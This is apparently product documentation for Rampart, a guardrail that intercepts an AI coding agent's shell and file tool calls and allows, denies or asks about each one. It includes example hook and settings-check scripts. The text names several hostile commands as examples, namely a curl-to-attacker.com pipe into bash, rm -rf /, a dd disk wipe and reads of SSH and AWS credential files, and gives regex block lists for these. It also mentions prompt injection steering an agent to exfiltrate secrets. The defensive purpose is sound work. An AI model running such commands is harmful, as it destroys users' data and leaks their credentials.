Securing Claude Code

Claude Code is Rampart's primary integration: one setup command, Claude Code's native hook system, and negligible per-call overhead.

Why You Need This

Claude Code in --dangerously-skip-permissions mode gives the agent unrestricted access to your shell, filesystem, and network. Without guardrails:

  • rm -rf / or rm -rf ~ runs silently
  • Your SSH keys, .env files, and API tokens are readable
  • curl http://attacker.com/exfil | bash executes without warning
  • A prompt-injected webpage can redirect the agent to exfiltrate your credentials

Rampart sits between Claude Code and your system. Every command is evaluated against your policy before it runs. Dangerous commands are blocked in microseconds. Everything is logged.

What Gets Protected by Default

The standard policy (~/.rampart/policies/standard.yaml) applies a different default to each of three risk categories (two of them deny outright, the third asks):

  Category                           Example                                                              Default
  Destructive commands               rm -rf /, dd if=/dev/urandom of=/dev/sda                             deny
  Credential stores / secret files   cat ~/.ssh/id_rsa, cat ~/.aws/credentials, cat ~/.codex/auth.json    deny
  Sensitive agent-state artifacts    cat ~/.claude/history.jsonl, reading Claude sessions,                ask
                                     editing ~/.claude/settings.json

This split is deliberate. Secret stores are too dangerous to expose silently. But agent history, shell snapshots, durable memory, and security-relevant settings are often legitimate to inspect, so Rampart requires human approval instead of hard-blocking them.

Setup

rampart setup claude-code

That's it. This installs hooks into Claude Code's hook system that intercept every:

  • Bash command (exec)
  • File read (read)
  • File write/edit (write)

How It Works

Claude Code has a built-in hook system that allows external tools to evaluate tool calls before they execute. Rampart registers as a hook handler.

Claude Code → Tool Call → rampart hook → Policy Engine → Allow/Deny
                                                       → Audit Trail

When Claude Code wants to run a command, it passes the tool-call JSON to rampart hook on stdin. Rampart evaluates it against your policies and writes one of three JSON responses to stdout:

// Allowed (an explicit allow also skips Claude Code's own permission prompt)
{"hookSpecificOutput":{"hookEventName":"PreToolUse","permissionDecision":"allow"}}

// Denied
{"hookSpecificOutput":{"hookEventName":"PreToolUse","permissionDecision":"deny","permissionDecisionReason":"Rampart: Destructive command blocked"}}

// Requires approval (waits for human decision)
{"hookSpecificOutput":{"hookEventName":"PreToolUse","permissionDecision":"ask","permissionDecisionReason":"Rampart: Manual approval required"}}

Ask behavior: When a policy action is ask, the hook returns "permissionDecision":"ask". Claude Code shows its native permission prompt, so the user approves or denies directly in the Claude Code UI.

Denied commands never execute. Claude Code receives the denial reason and can explain it to the user.
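The exchange above end to end, as an added example that is not Rampart's code: a minimal PreToolUse hook that reads the tool call from stdin, applies the deny/deny/ask split from the standard policy table, and writes the same response shapes to stdout. The rule tables are an illustrative Python stand-in for a policy, not Rampart's YAML format; the tool names and tool_input fields (Bash.command, Read/Write/Edit.file_path) are assumptions about what Claude Code sends; and the "Hook:" reason prefix and the fail-closed handling of unparseable input are choices made here, not documented Rampart behaviour.

```python
#!/usr/bin/env python3
"""Minimal PreToolUse hook speaking the same stdin/stdout JSON protocol as
`rampart hook`. Added example, not Rampart's code: the rule tables below are
an illustrative Python stand-in for a policy, not Rampart's YAML format, and
the tool names and tool_input fields (Bash.command, Read/Write/Edit.file_path)
are assumptions about what Claude Code sends."""
from __future__ import annotations

import json
import re
import sys

# Claude Code tool name -> hook kind (assumption on the tool names).
# Tools not listed here get no decision from this hook.
TOOL_KIND = {"Bash": "exec", "Read": "read",
             "Write": "write", "Edit": "write", "MultiEdit": "write"}

# Destructive shell commands: hard deny (exec only).
DESTRUCTIVE = [
    (r"\brm\s+-[a-zA-Z]*[rR][a-zA-Z]*\s+(/|~|\$HOME)/?(\s|$)",
     "Destructive command blocked"),
    (r"\bdd\b.*\bof=/dev/(sd|nvme|hd|disk)", "Raw write to a block device blocked"),
    (r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z|da)?sh\b",
     "Remote script piped to a shell blocked"),
]
# Credential stores: hard deny wherever the path appears (command or file path).
SECRETS = [
    r"\.ssh/id_\w+\b(?!\.pub)",       # private keys, but not their .pub halves
    r"\.aws/credentials\b",
    r"\.codex/auth\.json\b",
    r"(^|[\s/])\.env(\.\w+)?(\s|$)",  # .env, .env.local, ...
]
# Agent-state artifacts: often legitimate to inspect, so ask a human instead.
AGENT_STATE = [r"\.claude/(history\.jsonl|settings\.json)\b"]


def classify(tool_name: str, tool_input: dict) -> tuple[str, str | None]:
    """Return (decision, reason). decision is allow/deny/ask, or "none" when
    this hook has no opinion (unlisted tool) and Claude Code should fall back
    to its own permission flow."""
    kind = TOOL_KIND.get(tool_name)
    if kind is None:
        return "none", None
    target = str(tool_input.get("command" if kind == "exec" else "file_path", ""))
    if kind == "exec":
        for pattern, reason in DESTRUCTIVE:
            if re.search(pattern, target):
                return "deny", reason
    for pattern in SECRETS:
        if re.search(pattern, target):
            return "deny", "Credential store access blocked"
    for pattern in AGENT_STATE:
        if re.search(pattern, target):
            return "ask", "Agent state access requires manual approval"
    return "allow", None


def decide(event: dict) -> dict:
    """Build the hook's stdout JSON. An explicit allow skips Claude Code's own
    permission prompt, so it is only emitted for tools this hook evaluated;
    anything else gets an empty object, which leaves the decision to Claude Code."""
    decision, reason = classify(event.get("tool_name", ""), event.get("tool_input") or {})
    if decision == "none":
        return {}
    out = {"hookEventName": "PreToolUse", "permissionDecision": decision}
    if reason:
        out["permissionDecisionReason"] = "Hook: " + reason
    return {"hookSpecificOutput": out}


def main() -> None:
    try:
        response = decide(json.load(sys.stdin))
    except (ValueError, AttributeError) as exc:
        # Fail closed: unparseable input becomes a human prompt, not a silent allow.
        response = {"hookSpecificOutput": {
            "hookEventName": "PreToolUse", "permissionDecision": "ask",
            "permissionDecisionReason": f"Hook: could not parse input ({exc})"}}
    json.dump(response, sys.stdout)
    sys.stdout.write("\n")


if __name__ == "__main__":
    main()
```

Piping the troubleshooting line from this page into it, `echo '{"tool_name":"Bash","tool_input":{"command":"rm -rf /"}}' | python3 hook.py`, prints the deny response with reason "Hook: Destructive command blocked", while `rm -rf /tmp/build` and `cat ~/.ssh/id_rsa.pub` come back as allow. Two design points worth carrying into any real hook: an explicit allow is only emitted for tools the policy actually evaluated, because allow bypasses Claude Code's own prompt, and a hook that cannot parse its input asks rather than allows.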

Usage

Just use Claude Code normally:

claude

Rampart is completely transparent. Safe commands pass through in microseconds. You won't notice it's there — until it blocks something dangerous.

Monitor in Real Time

rampart watch

Custom Policy

By default, Rampart uses the standard profile. To customize:

# Edit your policy
vim ~/.rampart/policies/standard.yaml

# Changes take effect immediately (hot reload)

See Configuration for the full policy format.

Uninstall

rampart setup claude-code --remove

This removes the Rampart hooks from Claude Code's settings. Your policies and audit logs in ~/.rampart/ are preserved.

Troubleshooting

Verify hooks are installed

cat ~/.claude/settings.json

You should see Rampart entries for PreToolUse hooks.
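A scripted version of that check, added here as an example and not part of Rampart: it parses the hooks section of settings.json, lists the PreToolUse entries that invoke rampart, and reports which of the intercepted tools (Bash, Read, Write/Edit) have no covering matcher. The settings layout it assumes is Claude Code's (a list of matcher groups, each with a "hooks" list of command entries), the assumption that Rampart's entries are recognisable by a command whose program is named rampart is mine, and the sample settings embedded in it are constructed, not what Rampart actually writes.

```python
#!/usr/bin/env python3
"""Check that Claude Code's settings carry PreToolUse hooks for Rampart.
Added example, not Rampart's code. Assumes the Claude Code settings layout:
settings["hooks"]["PreToolUse"] is a list of groups, each with a "matcher"
(exact tool name, a regex such as "Edit|Write", or "*"/"" for every tool)
and a "hooks" list of {"type": "command", "command": "..."} entries. Which
entries count as Rampart's is an assumption: any command whose program is
named rampart."""
from __future__ import annotations

import json
import re
import sys
from pathlib import Path

# Tools the page says Rampart intercepts (Bash = exec, Read = read,
# Write/Edit = write). "Edit" as the tool name is an assumption.
EXPECTED_TOOLS = ("Bash", "Read", "Write", "Edit")

# Constructed sample of a settings.json after `rampart setup claude-code`;
# the exact entries Rampart writes are not shown on this page.
SAMPLE_SETTINGS = {"hooks": {"PreToolUse": [
    {"matcher": "Bash", "hooks": [{"type": "command", "command": "rampart hook"}]},
    {"matcher": "Read|Write|Edit",
     "hooks": [{"type": "command", "command": "rampart hook"}]},
]}}


def rampart_hooks(settings: dict, event: str = "PreToolUse") -> list[tuple[str, str]]:
    """Return (matcher, command) pairs under `event` whose command runs rampart."""
    found = []
    for group in settings.get("hooks", {}).get(event, []):
        matcher = group.get("matcher", "")
        for hook in group.get("hooks", []):
            command = hook.get("command", "")
            program = command.split()[0] if command.split() else ""
            if hook.get("type") == "command" and Path(program).name == "rampart":
                found.append((matcher, command))
    return found


def matcher_covers(matcher: str, tool: str) -> bool:
    """Apply Claude Code's matcher semantics: "" and "*" match every tool,
    otherwise the matcher is a regex that must match the whole tool name."""
    if matcher in ("", "*"):
        return True
    try:
        return re.fullmatch(matcher, tool) is not None
    except re.error:
        return False


def check(settings: dict) -> dict:
    """Report which expected tools are (not) covered by a Rampart PreToolUse hook."""
    hooks = rampart_hooks(settings)
    covered = {t for t in EXPECTED_TOOLS if any(matcher_covers(m, t) for m, _ in hooks)}
    return {"hooks": hooks,
            "missing": sorted(t for t in EXPECTED_TOOLS if t not in covered)}


def main(argv: list[str]) -> int:
    path = Path(argv[1]) if len(argv) > 1 else Path.home() / ".claude" / "settings.json"
    if path.exists():
        settings = json.loads(path.read_text())
    else:
        print(f"{path} not found; checking the constructed sample instead")
        settings = SAMPLE_SETTINGS
    report = check(settings)
    for matcher, command in report["hooks"]:
        print(f"PreToolUse matcher={matcher!r}: {command}")
    if report["missing"]:
        print("no Rampart hook covers:", ", ".join(report["missing"]))
        return 1
    print("all expected tools covered")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it with no arguments to check ~/.claude/settings.json, or pass another settings file as the first argument; a non-zero exit means at least one intercepted tool has no Rampart PreToolUse matcher, which is exactly the gap a partially applied or later hand-edited settings file leaves behind.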

Test a decision

echo '{"tool_name":"Bash","tool_input":{"command":"rm -rf /"}}' | rampart hook

Check audit log

rampart audit tail